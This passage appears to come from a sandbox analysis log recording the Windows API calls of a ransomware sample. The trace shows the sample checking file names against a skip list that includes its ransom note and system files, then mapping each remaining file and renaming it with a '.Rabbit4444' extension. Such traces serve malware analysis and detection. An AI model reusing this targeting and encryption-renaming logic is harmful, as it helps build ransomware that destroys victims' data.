lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0069.303] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16061360340) returned 1 [0069.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0069.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0069.303] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.303] CloseHandle (hObject=0x29c) returned 1 [0069.303] CloseHandle (hObject=0x280) returned 1 [0069.303] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\appcache[1].man.Rabbit4444") returned 128 [0069.303] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\appcache[1].man" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\appcache[1].man"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\appcache[1].man.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\appcache[1].man.rabbit4444"), dwFlags=0x1) returned 1 [0069.304] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf8c607c0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8c607c0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf8c607c0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0069.304] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0069.304] lstrcpyW (in: lpString1=0x130ec04, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0069.304] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\container.dat", dwFileAttributes=0x2022) returned 1 [0069.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\container.dat", dwFileAttributes=0x2006) returned 1 [0069.305] lstrlenW (lpString="container.dat") returned 13 [0069.305] lstrlenW (lpString="Rabbit4444") returned 10 [0069.305] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0069.305] lstrlenW (lpString=".dll") returned 4 [0069.305] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0069.305] lstrlenW (lpString=".lnk") returned 4 [0069.305] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0069.305] lstrlenW (lpString=".ini") returned 4 [0069.305] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0069.305] lstrlenW (lpString=".sys") returned 4 [0069.305] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0069.305] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8ec2d67, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8ec2d67, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x3cc6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", cAlternateFileName="C_D0E0~1.TXT")) returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2=".") returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="..") returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="windows") returned -1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="bootmgr") returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="pagefile.sys") returned -1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="boot") returned 1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="ids.txt") returned -1 [0069.305] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.305] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" [0069.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", dwFileAttributes=0x2000) returned 1 [0069.306] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned 85 [0069.306] lstrlenW (lpString="Rabbit4444") returned 10 [0069.306] lstrcmpiW (lpString1="_10[1].txt", lpString2="Rabbit4444") returned -1 [0069.306] lstrlenW (lpString=".dll") returned 4 [0069.306] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.306] lstrlenW (lpString=".lnk") returned 4 [0069.306] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.306] lstrlenW (lpString=".ini") returned 4 [0069.306] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.306] lstrlenW (lpString=".sys") returned 4 [0069.306] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.310] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.310] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16062043129) returned 1 [0069.310] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=15558) returned 1 [0069.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0069.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0069.310] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3fd0, lpName=0x0) returned 0x29c [0069.311] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3fd0) returned 0x70000 [0069.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0069.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0069.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0069.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.313] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0069.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16062427588) returned 1 [0069.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0069.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0069.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.314] CloseHandle (hObject=0x29c) returned 1 [0069.314] CloseHandle (hObject=0x280) returned 1 [0069.314] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt.Rabbit4444") returned 198 [0069.314] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.315] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f0f23b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8f0f23b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x8744, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", cAlternateFileName="C_647E~1.TXT")) returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2=".") returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="..") returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="windows") returned -1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="bootmgr") returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="pagefile.sys") returned -1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="boot") returned 1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="ids.txt") returned -1 [0069.315] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.315] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" [0069.316] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt", dwFileAttributes=0x2000) returned 1 [0069.316] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt") returned 85 [0069.316] lstrlenW (lpString="Rabbit4444") returned 10 [0069.316] lstrcmpiW (lpString1="_11[1].txt", lpString2="Rabbit4444") returned -1 [0069.316] lstrlenW (lpString=".dll") returned 4 [0069.316] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.316] lstrlenW (lpString=".lnk") returned 4 [0069.316] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.316] lstrlenW (lpString=".ini") returned 4 [0069.316] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.316] lstrlenW (lpString=".sys") returned 4 [0069.316] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.317] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.317] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16062742745) returned 1 [0069.317] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=34628) returned 1 [0069.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0069.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0069.317] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a50, lpName=0x0) returned 0x29c [0069.320] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a50) returned 0x70000 [0069.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0069.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0069.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16063402800) returned 1 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0069.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0069.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.324] CloseHandle (hObject=0x29c) returned 1 [0069.324] CloseHandle (hObject=0x280) returned 1 [0069.324] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt.Rabbit4444") returned 198 [0069.324] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_11[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.325] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8f3546b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8f3546b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7ab99073, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", cAlternateFileName="C_EAA3~1.TXT")) returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2=".") returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="..") returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="windows") returned -1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="bootmgr") returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="pagefile.sys") returned -1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="boot") returned 1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="ids.txt") returned -1 [0069.325] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.325] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" [0069.325] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt", dwFileAttributes=0x2000) returned 1 [0069.325] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt") returned 85 [0069.325] lstrlenW (lpString="Rabbit4444") returned 10 [0069.325] lstrcmpiW (lpString1="_12[1].txt", lpString2="Rabbit4444") returned -1 [0069.325] lstrlenW (lpString=".dll") returned 4 [0069.326] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.326] lstrlenW (lpString=".lnk") returned 4 [0069.326] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.326] lstrlenW (lpString=".ini") returned 4 [0069.326] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.326] lstrlenW (lpString=".sys") returned 4 [0069.326] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.326] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_12[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.326] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.326] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16063690009) returned 1 [0069.326] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2949) returned 1 [0069.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0069.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0069.326] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe90, lpName=0x0) returned 0x29c [0069.327] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe90) returned 0x70000 [0069.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0069.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0069.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0069.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: 